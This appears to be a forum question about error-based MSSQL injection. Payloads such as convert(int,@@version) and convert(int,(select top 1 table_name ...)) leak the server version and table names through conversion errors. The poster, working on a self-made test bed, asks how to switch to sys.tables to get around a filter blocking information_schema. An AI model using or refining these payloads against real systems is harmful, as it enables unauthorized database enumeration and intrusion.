# MSSQL injection convert syntax error

Tags: sql-injection

I just setup a test bed and i disabled information_schema from being accessed (a weak waf) and i've been trying to extract the table list from the database by using convert to spit out a conversion error with the contained information.
To extract the version we use the syntax:
+and+1=convert(int,@@version)
The result will be:

```
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (SP2) Copyright (c) Microsoft Corporation Standard Edition Windows NT 6.1 (Build 7601: Service Pack 1) (Hypervisor) ' to data type int.
```

The result of the query is what is within the single quotes.
Now to get the first table from the database normally we would use:

```
convert(int,(select+top+1+table_name+from+information_schema.tables))
```

Which would lead to the error:

```
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'tblDepartement' to data type int.

index.asp, line 30
```

Again with the answer being within the two single quotes which is `tblDepartement`.
Alternative way to extract the table names would be to use these following 2 queries:

```
(A):SELECT name FROM sys.tables
```

(B):`select * from sys.tables`.
If i try (A) with this syntax:

```
convert(int,(select name FROM sys.tables))
```

I get the error:

```
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'from'.
```

If i try (B) with this syntax:
`convert(int,(select * FROM sys.tables))`
I get the error:

```
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near '*'.
```

So my question is, how can i not use information_schema and use sys.tables instead inside the convert syntax so i can get the table list from the database?
Thanks.